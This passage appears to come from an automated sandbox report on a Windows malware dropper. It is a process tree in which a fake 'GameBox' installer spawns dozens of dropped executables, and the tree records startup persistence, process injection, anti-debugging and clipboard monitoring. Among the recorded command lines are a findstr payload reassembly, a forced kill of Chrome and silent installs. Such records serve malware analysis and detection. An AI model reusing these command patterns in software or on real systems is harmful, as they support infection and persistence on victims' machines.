                                                                          findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                          9⤵
                                                                            PID:8084
                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                            Esplorarne.exe.com i
                                                                            9⤵
                                                                            • Suspicious use of FindShellTrayWindow
                                                                            • Suspicious use of SendNotifyMessage
                                                                            PID:7408
                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                              10⤵
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              • Suspicious use of SendNotifyMessage
                                                                              PID:7312
                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                11⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                • Suspicious use of SendNotifyMessage
                                                                                PID:5256
                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                  12⤵
                                                                                  • Suspicious use of SendNotifyMessage
                                                                                  PID:5904
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                    13⤵
                                                                                      PID:7964
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                        14⤵
                                                                                        • Suspicious use of SendNotifyMessage
                                                                                        PID:6212
                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                          15⤵
                                                                                          • Suspicious use of SendNotifyMessage
                                                                                          PID:7452
                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                            16⤵
                                                                                            • Suspicious use of SendNotifyMessage
                                                                                            PID:8028
                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                              17⤵
                                                                                              • Suspicious use of SendNotifyMessage
                                                                                              PID:2640
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                18⤵
                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                PID:8288
                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                  19⤵
                                                                                                    PID:8796
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                      20⤵
                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                      PID:7720
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                        21⤵
                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                        PID:8616
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                          22⤵
                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                          PID:9028
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                            23⤵
                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                            PID:7464
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                              24⤵
                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                              PID:8316
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                25⤵
                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                PID:7308
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                  26⤵
                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                  PID:8684
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                    27⤵
                                                                                                                    • Drops startup file
                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                    PID:8408
                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                ping GFBFPSXA -n 30
                                                                                9⤵
                                                                                • Runs ping.exe
                                                                                PID:5184
                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        • Checks computer location settings
                                                                        PID:5372
                                                                        • C:\Users\Admin\Documents\5yqbla52_obs43yM9A5V6OVt.exe
                                                                          "C:\Users\Admin\Documents\5yqbla52_obs43yM9A5V6OVt.exe"
                                                                          6⤵
                                                                            PID:6716
                                                                            • C:\Users\Admin\Documents\5yqbla52_obs43yM9A5V6OVt.exe
                                                                              "C:\Users\Admin\Documents\5yqbla52_obs43yM9A5V6OVt.exe"
                                                                              7⤵
                                                                                PID:6564
                                                                            • C:\Users\Admin\Documents\PF6sa3qLzPISCi5AWNUOwR3M.exe
                                                                              "C:\Users\Admin\Documents\PF6sa3qLzPISCi5AWNUOwR3M.exe"
                                                                              6⤵
                                                                                PID:6888
                                                                              • C:\Users\Admin\Documents\DBnmFqom4PtuhM2l2lXP54GF.exe
                                                                                "C:\Users\Admin\Documents\DBnmFqom4PtuhM2l2lXP54GF.exe"
                                                                                6⤵
                                                                                  PID:6708
                                                                                  • C:\Users\Admin\Documents\DBnmFqom4PtuhM2l2lXP54GF.exe
                                                                                    "C:\Users\Admin\Documents\DBnmFqom4PtuhM2l2lXP54GF.exe" -q
                                                                                    7⤵
                                                                                      PID:7688
                                                                                  • C:\Users\Admin\Documents\X8mEINzv3jYKJExJbPHtq01a.exe
                                                                                    "C:\Users\Admin\Documents\X8mEINzv3jYKJExJbPHtq01a.exe"
                                                                                    6⤵
                                                                                      PID:6700
                                                                                    • C:\Users\Admin\Documents\2oUJg7DOM1Rzqzu2J6rWPZ9i.exe
                                                                                      "C:\Users\Admin\Documents\2oUJg7DOM1Rzqzu2J6rWPZ9i.exe"
                                                                                      6⤵
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:6692
                                                                                      • C:\Users\Admin\Documents\2oUJg7DOM1Rzqzu2J6rWPZ9i.exe
                                                                                        C:\Users\Admin\Documents\2oUJg7DOM1Rzqzu2J6rWPZ9i.exe
                                                                                        7⤵
                                                                                          PID:6768
                                                                                      • C:\Users\Admin\Documents\7vwDF4zkqCOLfu1soZ9q2zuz.exe
                                                                                        "C:\Users\Admin\Documents\7vwDF4zkqCOLfu1soZ9q2zuz.exe"
                                                                                        6⤵
                                                                                          PID:6684
                                                                                        • C:\Users\Admin\Documents\EPbhop2Pn9qov_q1lPEt6IKY.exe
                                                                                          "C:\Users\Admin\Documents\EPbhop2Pn9qov_q1lPEt6IKY.exe"
                                                                                          6⤵
                                                                                            PID:6676
                                                                                          • C:\Users\Admin\Documents\u9go0Nmw3t5_LAT33R9D1Uy5.exe
                                                                                            "C:\Users\Admin\Documents\u9go0Nmw3t5_LAT33R9D1Uy5.exe"
                                                                                            6⤵
                                                                                              PID:6668
                                                                                              • C:\Users\Admin\AppData\Roaming\3763986.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\3763986.exe"
                                                                                                7⤵
                                                                                                  PID:4024
                                                                                                • C:\Users\Admin\AppData\Roaming\4549828.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\4549828.exe"
                                                                                                  7⤵
                                                                                                  • Suspicious behavior: SetClipboardViewer
                                                                                                  PID:7708
                                                                                              • C:\Users\Admin\Documents\DJJPFjLtwut2D3ZJ81a46dEX.exe
                                                                                                "C:\Users\Admin\Documents\DJJPFjLtwut2D3ZJ81a46dEX.exe"
                                                                                                6⤵
                                                                                                • Suspicious use of SetThreadContext
                                                                                                PID:6660
                                                                                                • C:\Users\Admin\Documents\DJJPFjLtwut2D3ZJ81a46dEX.exe
                                                                                                  C:\Users\Admin\Documents\DJJPFjLtwut2D3ZJ81a46dEX.exe
                                                                                                  7⤵
                                                                                                    PID:5244
                                                                                                • C:\Users\Admin\Documents\4w4fHn51p93EC9vPv5BxScoG.exe
                                                                                                  "C:\Users\Admin\Documents\4w4fHn51p93EC9vPv5BxScoG.exe"
                                                                                                  6⤵
                                                                                                  • Checks BIOS information in registry
                                                                                                  • Checks whether UAC is enabled
                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                  PID:6652
                                                                                                • C:\Users\Admin\Documents\GLFxk7PJGDw9PdquJPB2RZDH.exe
                                                                                                  "C:\Users\Admin\Documents\GLFxk7PJGDw9PdquJPB2RZDH.exe"
                                                                                                  6⤵
                                                                                                    PID:6644
                                                                                                  • C:\Users\Admin\Documents\sPToRzHZ4ySlwl3er2NULgYb.exe
                                                                                                    "C:\Users\Admin\Documents\sPToRzHZ4ySlwl3er2NULgYb.exe"
                                                                                                    6⤵
                                                                                                      PID:6636
                                                                                                    • C:\Users\Admin\Documents\9bnByOnlF9RY314S0nwR8GnC.exe
                                                                                                      "C:\Users\Admin\Documents\9bnByOnlF9RY314S0nwR8GnC.exe"
                                                                                                      6⤵
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Checks whether UAC is enabled
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      PID:6628
                                                                                                    • C:\Users\Admin\Documents\ndK8rGWicWu0Nk64ejRO0WAH.exe
                                                                                                      "C:\Users\Admin\Documents\ndK8rGWicWu0Nk64ejRO0WAH.exe"
                                                                                                      6⤵
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:6620
                                                                                                      • C:\Users\Admin\Documents\ndK8rGWicWu0Nk64ejRO0WAH.exe
                                                                                                        C:\Users\Admin\Documents\ndK8rGWicWu0Nk64ejRO0WAH.exe
                                                                                                        7⤵
                                                                                                          PID:6752
                                                                                                        • C:\Users\Admin\Documents\ndK8rGWicWu0Nk64ejRO0WAH.exe
                                                                                                          C:\Users\Admin\Documents\ndK8rGWicWu0Nk64ejRO0WAH.exe
                                                                                                          7⤵
                                                                                                            PID:4244
                                                                                                        • C:\Users\Admin\Documents\p3_VH1NL0rNn_Fd8fVSqhnDa.exe
                                                                                                          "C:\Users\Admin\Documents\p3_VH1NL0rNn_Fd8fVSqhnDa.exe"
                                                                                                          6⤵
                                                                                                          • Checks BIOS information in registry
                                                                                                          • Checks whether UAC is enabled
                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                          PID:6612
                                                                                                        • C:\Users\Admin\Documents\DsIC8siRX3LQrzsb0Rj5UiHm.exe
                                                                                                          "C:\Users\Admin\Documents\DsIC8siRX3LQrzsb0Rj5UiHm.exe"
                                                                                                          6⤵
                                                                                                          • Checks SCSI registry key(s)
                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                          PID:6604
                                                                                                        • C:\Users\Admin\Documents\x95HwHnT7fyna8tzpqtwGk8U.exe
                                                                                                          "C:\Users\Admin\Documents\x95HwHnT7fyna8tzpqtwGk8U.exe"
                                                                                                          6⤵
                                                                                                          • Checks BIOS information in registry
                                                                                                          • Checks whether UAC is enabled
                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                          PID:6596
                                                                                                        • C:\Users\Admin\Documents\UD_RFYN887aqgthsrbKA3lY7.exe
                                                                                                          "C:\Users\Admin\Documents\UD_RFYN887aqgthsrbKA3lY7.exe"
                                                                                                          6⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:6588
                                                                                                        • C:\Users\Admin\Documents\J7TRn97pcyRwmXwkZCJF0Oqe.exe
                                                                                                          "C:\Users\Admin\Documents\J7TRn97pcyRwmXwkZCJF0Oqe.exe"
                                                                                                          6⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:6580
                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                        5⤵
                                                                                                          PID:5256
                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:5632
                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5196
                                                                                                          • C:\Users\Admin\AppData\Roaming\8616791.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\8616791.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:5984
                                                                                                          • C:\Users\Admin\AppData\Roaming\3992888.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\3992888.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious behavior: SetClipboardViewer
                                                                                                            PID:5128
                                                                                                          • C:\Users\Admin\AppData\Roaming\5694145.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\5694145.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4104
                                                                                                          • C:\Users\Admin\AppData\Roaming\1402006.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\1402006.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:5768
                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5168
                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:4016
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                                                                            6⤵
                                                                                                              PID:6344
                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                taskkill /f /im chrome.exe
                                                                                                                7⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:7104
                                                                                                    • C:\Users\Admin\Documents\rkPE5DBLTGDv02LKIvcnbRaA.exe
                                                                                                      "C:\Users\Admin\Documents\rkPE5DBLTGDv02LKIvcnbRaA.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4268
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 660
                                                                                                        3⤵
                                                                                                        • Program crash
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4592
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 712
                                                                                                        3⤵
                                                                                                        • Program crash
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4792
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 740
                                                                                                        3⤵
                                                                                                        • Program crash
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:5004
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 708
                                                                                                        3⤵
                                                                                                        • Program crash
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:5052
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 1168
                                                                                                        3⤵
                                                                                                        • Program crash
                                                                                                        PID:1484
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 1176
                                                                                                        3⤵
                                                                                                        • Program crash
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1432
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 1160
                                                                                                        3⤵
                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                        • Program crash
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4880
                                                                                                    • C:\Users\Admin\Documents\wScmLlqgXgou2Kqv1H48v7Zz.exe
                                                                                                      "C:\Users\Admin\Documents\wScmLlqgXgou2Kqv1H48v7Zz.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4208
                                                                                                    • C:\Users\Admin\Documents\FAzGeU9FDFvVLT2tW8av1EdS.exe
                                                                                                      "C:\Users\Admin\Documents\FAzGeU9FDFvVLT2tW8av1EdS.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      PID:4144
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 760
                                                                                                        3⤵
                                                                                                        • Program crash
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4528
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 784
                                                                                                        3⤵
                                                                                                        • Program crash
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4324
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 856
                                                                                                        3⤵
                                                                                                        • Program crash
                                                                                                        PID:4304
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 872
                                                                                                        3⤵
                                                                                                        • Program crash
                                                                                                        PID:5340
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 828
                                                                                                        3⤵
                                                                                                        • Program crash
                                                                                                        PID:5992
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 776
                                                                                                        3⤵
                                                                                                        • Program crash
                                                                                                        PID:5388
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 736
                                                                                                        3⤵
                                                                                                        • Program crash
                                                                                                        PID:5888
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 1388
                                                                                                        3⤵
                                                                                                        • Program crash
                                                                                                        PID:5444
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 1476
                                                                                                        3⤵
                                                                                                        • Program crash
                                                                                                        PID:5860
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 1328
                                                                                                        3⤵
                                                                                                        • Program crash
                                                                                                        PID:5488
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 1488
                                                                                                        3⤵
                                                                                                        • Program crash
                                                                                                        PID:6104
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 1392
                                                                                                        3⤵
                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                        • Program crash
                                                                                                        PID:5424
                                                                                                    • C:\Users\Admin\Documents\rYRTRoBHI_cv1fL5TOqyjhNk.exe
                                                                                                      "C:\Users\Admin\Documents\rYRTRoBHI_cv1fL5TOqyjhNk.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1360
                                                                                                      • C:\Users\Admin\AppData\Roaming\1651759.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\1651759.exe"
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:3488
                                                                                                      • C:\Users\Admin\AppData\Roaming\7592950.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\7592950.exe"
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Adds Run key to start application
                                                                                                        PID:800
                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                          4⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:4100
                                                                                                    • C:\Users\Admin\Documents\zCskxqYHKHt5TUfvQe1PwBDu.exe
                                                                                                      "C:\Users\Admin\Documents\zCskxqYHKHt5TUfvQe1PwBDu.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:2288
                                                                                                      • C:\Users\Admin\Documents\zCskxqYHKHt5TUfvQe1PwBDu.exe
                                                                                                        C:\Users\Admin\Documents\zCskxqYHKHt5TUfvQe1PwBDu.exe
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:4692
                                                                                                      • C:\Users\Admin\Documents\zCskxqYHKHt5TUfvQe1PwBDu.exe
                                                                                                        C:\Users\Admin\Documents\zCskxqYHKHt5TUfvQe1PwBDu.exe
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4832
                                                                                                    • C:\Users\Admin\Documents\6KYUbg5R6XnXu8SovmNlth6F.exe
                                                                                                      "C:\Users\Admin\Documents\6KYUbg5R6XnXu8SovmNlth6F.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:364
                                                                                                      • C:\Users\Admin\Documents\6KYUbg5R6XnXu8SovmNlth6F.exe
                                                                                                        C:\Users\Admin\Documents\6KYUbg5R6XnXu8SovmNlth6F.exe
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4676
                                                                                                    • C:\Users\Admin\Documents\XbBKiV5fhiLutPoRle2EBNb0.exe
                                                                                                      "C:\Users\Admin\Documents\XbBKiV5fhiLutPoRle2EBNb0.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1688
                                                                                                    • C:\Users\Admin\Documents\W_MlxlKWej5qxr_tBwJVpR4r.exe
                                                                                                      "C:\Users\Admin\Documents\W_MlxlKWej5qxr_tBwJVpR4r.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:2088
                                                                                                    • C:\Users\Admin\Documents\Uf7DD7o9Ezb9GFx7EXQ7b_Rg.exe
                                                                                                      "C:\Users\Admin\Documents\Uf7DD7o9Ezb9GFx7EXQ7b_Rg.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:2868
                                                                                                      • C:\Users\Admin\Documents\Uf7DD7o9Ezb9GFx7EXQ7b_Rg.exe
                                                                                                        "C:\Users\Admin\Documents\Uf7DD7o9Ezb9GFx7EXQ7b_Rg.exe"
                                                                                                        3⤵
                                                                                                          PID:5136
                                                                                                      • C:\Users\Admin\Documents\pAlrwMY2B6TU8O10UJINpdUI.exe
                                                                                                        "C:\Users\Admin\Documents\pAlrwMY2B6TU8O10UJINpdUI.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:1556
                                                                                                    • C:\Users\Admin\Documents\pAlrwMY2B6TU8O10UJINpdUI.exe
                                                                                                      C:\Users\Admin\Documents\pAlrwMY2B6TU8O10UJINpdUI.exe
                                                                                                      1⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:4668
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-3VB3R.tmp\MediaBurner2.tmp
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-3VB3R.tmp\MediaBurner2.tmp" /SL5="$103B4,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                      1⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      PID:5580
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-7MSTB.tmp\3377047_logo_media.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-7MSTB.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                                                                                        2⤵
                                                                                                        • Drops file in Drivers directory
                                                                                                        • Executes dropped EXE
                                                                                                        • Adds Run key to start application
                                                                                                        • Drops file in Program Files directory
                                                                                                        PID:5504
                                                                                                        • C:\Program Files\Google\RUQKCGTUKO\ultramediaburner.exe
                                                                                                          "C:\Program Files\Google\RUQKCGTUKO\ultramediaburner.exe" /VERYSILENT
                                                                                                          3⤵
                                                                                                            PID:8180
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-ID1CN.tmp\ultramediaburner.tmp
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-ID1CN.tmp\ultramediaburner.tmp" /SL5="$2047A,281924,62464,C:\Program Files\Google\RUQKCGTUKO\ultramediaburner.exe" /VERYSILENT
                                                                                                              4⤵
                                                                                                              • Drops file in Program Files directory
                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                              PID:7240
                                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                5⤵
                                                                                                                  PID:7192
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7f-050fc-385-6e6b4-212a5b730f2d2\Fapaebezhavy.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\7f-050fc-385-6e6b4-212a5b730f2d2\Fapaebezhavy.exe"
                                                                                                              3⤵
                                                                                                              • Checks computer location settings
                                                                                                              PID:6864
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\ce-43f31-814-d088b-55b7585c8140f\SHacyshydeshe.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\ce-43f31-814-d088b-55b7585c8140f\SHacyshydeshe.exe"
                                                                                                              3⤵
                                                                                                                PID:7484
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v1vpvoli.3i3\GcleanerEU.exe /eufive & exit
                                                                                                                  4⤵
                                                                                                                    PID:7912
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\v1vpvoli.3i3\GcleanerEU.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\v1vpvoli.3i3\GcleanerEU.exe /eufive
                                                                                                                      5⤵
                                                                                                                        PID:5764
                                                                                                                    • C:\Windows\System32\cmd.exe
